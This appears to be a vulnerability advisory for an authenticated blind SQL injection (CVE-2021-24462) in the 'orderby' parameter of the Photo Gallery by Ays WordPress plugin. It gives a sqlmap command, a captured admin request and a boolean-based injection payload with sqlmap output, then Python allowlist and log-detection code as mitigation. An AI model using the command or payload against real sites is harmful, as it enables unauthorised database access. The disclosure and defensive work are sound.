Plugin "Photo Gallery" by Ays < 4.4.4 Authenticated Blind SQL Injection
Title | Published | Family
---|---|---
CVE-2021-24462 | 2 Aug 2021 11:15 | nvd
CVE-2021-24462 | 2 Aug 2021 11:15 | cve
Sql injection | 2 Aug 2021 11:15 | prion
CVE-2021-24462 Photo Gallery by Ays - Responsive Image Gallery < 4.4.4 - Authenticated Blind SQL Injections | 2 Aug 2021 10:32 | cvelist
WordPress Photo Gallery by Ays plugin <= 4.4.3 - Authenticated Blind SQL Injection (SQLi) vulnerability | 29 Jun 2021 00:00 | patchstack
Photo Gallery by Ays - Responsive Image Gallery < 4.4.4 - Authenticated Blind SQL Injections | 29 Jun 2021 00:00 | wpvulndb
SQLMAP: python sqlmap.py -r r.txt -p orderby --level 5 --risk 3 --dbms MySQL --technique B --dbs
Here r.txt holds the captured GET or POST request that sorts items in the plugin menu; the injectable parameter is orderby.
GET /wp-admin/admin.php?page=.........&orderby=id--&order=desc HTTP/1.1
Host: ...
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: vi-VN,vi;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: close
Cookie: ...
Upgrade-Insecure-Requests: 1
SQLMAP OUTPUT:
---
Parameter: orderby (GET)
Type: boolean-based blind
Title: Boolean-based blind - Parameter replace (original value)
Payload: page=............&orderby=(SELECT (CASE WHEN (5750=5750) THEN 0x7469746c65 ELSE (SELECT 1570 UNION SELECT 3396) END))&order=asc
---
[22:38:25] [INFO] testing MySQL
[22:38:25] [INFO] confirming MySQL
[22:38:25] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 20.04 or 19.10 (focal or eoan)
web application technology: Apache 2.4.41
back-end DBMS: MySQL >= 8.0.0
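As an added defender-side example (not code from the plugin or from this advisory), the Python below shows the mitigation for this bug class and a matching detection: an ORDER BY column is an identifier, so it cannot be bound as a prepared-statement parameter and must instead be mapped onto a fixed allowlist, and the same allowlist can be used to flag access-log requests carrying orderby values like the `id--` probe and the boolean-based CASE payload above. The column names, the PLUGIN_PAGE slug and the log lines are constructed placeholders.

```python
import re
from urllib.parse import urlparse, parse_qs

# Allowlist of sortable columns and directions (assumed names, not the
# plugin's real schema). Anything outside this set is never interpolated.
SORTABLE_COLUMNS = {"id", "title", "date"}
SORT_DIRECTIONS = {"asc", "desc"}

# Tokens that have no business in a column-name parameter.
SUSPICIOUS = re.compile(r"(--|/\*|\(|\bselect\b|\bcase\b|\bunion\b)", re.IGNORECASE)

# Common/Combined log format: client ident user [time] "METHOD path ..."
LOG_RE = re.compile(r'(\S+) \S+ \S+ \[[^\]]+\] "(GET|POST) (\S+)')


def safe_order_clause(orderby, order, default=("id", "desc")):
    """Build an ORDER BY clause from untrusted input.

    Identifiers cannot be parameterised, so the input is only ever used as
    a key into the allowlist; unknown values fall back to the default
    instead of being concatenated into SQL.
    """
    col = orderby if orderby in SORTABLE_COLUMNS else default[0]
    direction = order.lower() if order.lower() in SORT_DIRECTIONS else default[1]
    return f"ORDER BY {col} {direction.upper()}"


def flag_orderby_requests(log_lines):
    """Return (client_ip, orderby_value, reason) for requests whose
    orderby parameter is not a plain allowlisted column name."""
    hits = []
    for line in log_lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        query = parse_qs(urlparse(m.group(3)).query)  # percent-decodes values
        for value in query.get("orderby", []):
            if value in SORTABLE_COLUMNS:
                continue
            reason = "injection-pattern" if SUSPICIOUS.search(value) else "unknown-column"
            hits.append((m.group(1), value, reason))
    return hits


# Constructed sample log lines: one benign sort, then the two probes from the advisory.
LOGS = [
    '203.0.113.5 - - [29/Jun/2021:22:38:25 +0000] "GET /wp-admin/admin.php?page=PLUGIN_PAGE&orderby=id&order=desc HTTP/1.1" 200 5120',
    '203.0.113.5 - - [29/Jun/2021:22:38:26 +0000] "GET /wp-admin/admin.php?page=PLUGIN_PAGE&orderby=id--&order=desc HTTP/1.1" 200 5120',
    '203.0.113.5 - - [29/Jun/2021:22:38:27 +0000] "GET /wp-admin/admin.php?page=PLUGIN_PAGE&orderby=(SELECT%20(CASE%20WHEN%20(5750=5750)%20THEN%200x7469746c65%20ELSE%20(SELECT%201570%20UNION%20SELECT%203396)%20END))&order=asc HTTP/1.1" 200 5120',
]

if __name__ == "__main__":
    print(safe_order_clause("id--", "desc"))
    for hit in flag_orderby_requests(LOGS):
        print(hit)
```

In a WordPress plugin the equivalent of safe_order_clause is an explicit in_array() check against the plugin's own column list (or core's sanitize_sql_orderby()) before the value reaches $wpdb, since $wpdb->prepare() placeholders cover values, not identifiers.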